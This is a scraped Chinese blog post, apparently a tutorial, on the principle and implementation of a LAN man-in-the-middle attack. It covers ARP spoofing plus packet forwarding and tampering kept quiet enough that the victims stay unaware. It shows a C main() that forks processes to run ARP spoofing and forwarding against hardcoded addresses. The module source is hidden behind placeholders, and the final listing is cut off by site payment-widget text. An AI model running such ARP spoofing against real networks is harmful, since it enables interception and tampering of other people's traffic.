中间人攻击的原理与实现

  下面是整篇文章的鸟瞰图:(读者应该了解局域网ARP协议)

  上图便是局域网中的中间人攻击的大概思想,下面给出具体的实现方法:

(备注:右键另存为 大图较清晰)

实现"中间人"的情景,有两个关键点:

    · ARP欺骗:目的是将通信双方的数据包流经中间人。

    · 数据包分析、篡改与转发:维持通信双发的通信链接不至于中断,以免对方警觉,这样才能顺利进行下一步的行动。

  第一步:ArpSpoof

(备注:右键另存为 大图较清晰) 

  ArpSpoof模块的源码如下:

 View Code

  第二步:数据包分析、转发

  这里仅转发IP数据包,于是,我们以较简单的icmp-request & icmp-reply 为例:

  mitm-forwarder模块的源码如下:

 View Code

 第三步:

   借助于进程的fork模型,将arpspoof与mitm-forwarder二者整合为一个接口:

void main()

{
    uint8_t ip_A[4]={192,168,1,1};
    uint8_t mac_A[6]={0x14,0xE6,0xE4,0x94,0xB4,0xD6};
    uint8_t ip_B[4]={192,168,1,108};
    uint8_t mac_B[6]={0x00,0x7B,0x05,0x03,0x8E,0x90};
    uint8_t mac_M[6]={0x00,0x11,0x22,0x33,0x44,0x55};
    //BPF_filterStr: ether dst mac_M  and ip
    char * BPF_filterStr=" ether dst 00:11:22:33:44:55 and ip ";
    char * devMitm="eth0";

  //local
  pid_t sonPid;
  sonPid=fork();
  if( sonPid==-1 )
  {//failure
    printf("failure:mitm fork error :( \n");
  }
  else if(sonPid==0)
  {//child
    printf("child : pid:%d:)\n",getpid());
    ArpSpoof( ip_A,mac_A,ip_B,mac_B,mac_M,devMitm );
  }
  else
  {//parent
    printf("parent: pid:%d sonPid:%d :)\n",getpid(),sonPid);
    sleep(2);
    mitm_forwarder(
       ip_A,mac_A,
      ip_B,mac_B,
      mac_M,BPF_filterStr,
      devMitm
        );
  }
}
 

  如此,最终代码如下:

#include<unistd.h>
#include<pcap.h>
#include<time.h>
#include<stdio.h>
#inclu
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值